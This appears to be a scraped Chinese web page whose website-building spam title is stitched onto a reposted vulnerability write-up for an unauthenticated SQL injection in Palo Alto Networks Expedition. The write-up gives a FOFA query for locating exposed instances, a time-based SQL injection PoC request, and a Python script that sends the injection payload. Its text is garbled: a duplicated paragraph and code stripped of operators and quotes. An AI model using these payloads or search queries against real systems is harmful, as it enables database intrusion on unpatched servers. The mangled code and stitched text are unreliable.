当前位置：首页 > news >正文

网站建设期末作业美色商城网站建设

news 2025/12/20 19:20:33

网站建设期末作业,美色商城网站建设,中国中小企业信息网,网站建设公司上海0x01 产品介绍#xff1a; Palo Alto Networks Expedition 是一款强大的工具#xff0c;帮助用户有效地迁移和优化网络安全策略#xff0c;提升安全管理的效率和效果。它的自动化功能、策略分析和可视化报告使其在网络安全领域中成为一个重要的解决方案。 0x02 漏洞描述 Palo Alto Networks Expedition 是一款强大的工具帮助用户有效地迁移和优化网络安全策略提升安全管理的效率和效果。它的自动化功能、策略分析和可视化报告使其在网络安全领域中成为一个重要的解决方案。 0x02 漏洞描述该漏洞由于CHECKPOINT.php文件存在未授权访问。在sql校验逻辑中存在actionimport当解析控制参数时会创建变量routename和id并且以字符串格式构造查询。导致了漏洞的产生 0x03 影响版本 Palo Alto Networks Expedition 1.2.96 0x04 搜索语句 Fofa:titleExpedition Project 0x05 漏洞复现 poc POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1 Host: your-ip Content-Type: application/x-www-form-urlencodedactionimporttypetestprojectpandbRBACsignatureid1%20AND%20(SELECT%201234%20FROM%20(SELECT(SLEEP(5)))test) 检测脚本脚本作者https://github.com/horizon3ai/CVE-2024-9465 #!/usr/bin/python3 import argparse import requests import urllib3 import sys import time urllib3.disable_warnings()def create_checkpoint_table(url: str):print(f[*] Creating Checkpoint database table...)data {action: get,type: existing_ruleBases,project: pandbRBAC,}r requests.post(f{url}/bin/configurations/parsers/Checkpoint/CHECKPOINT.php, datadata, verifyFalse, timeout30)if r.status_code 200 and ruleBasesNames in r.text:print(f[*] Successfully created the database table)returnprint(f[-] Unexpected response creating table: {r.status_code}:{r.text})sys.exit(1)def inject_checkpoint_query(url: str):start_time time.time()print(f[*] Injecting 10 second sleep payload into database query...)data {action: import,type: test,project: pandbRBAC,signatureid: 1 AND (SELECT 1234 FROM (SELECT(SLEEP(10)))horizon3),}r requests.post(f{url}/bin/configurations/parsers/Checkpoint/CHECKPOINT.php, datadata, verifyFalse, timeout30)execution_time time.time() - start_timeif r.status_code 200 and execution_time 9 and execution_time 15:print(f[*] Successfully sent injection payload!)print(f[] Target is vulnerable, request took {execution_time} seconds)returnprint(f[-] Unexpected response sending injection payload: {r.status_code}:{r.text})sys.exit(1)if __name__ __main__:parser argparse.ArgumentParser()parser.add_argument(-u, --url, helpThe URL of the target, typestr, requiredTrue)args parser.parse_args()create_checkpoint_table(args.url)inject_checkpoint_query(args.url)0x06 修复建议厂商已发布补丁请即时升级 Expedition | Palo Alto Networks

查看全文

http://www.pierceye.com/news/843397/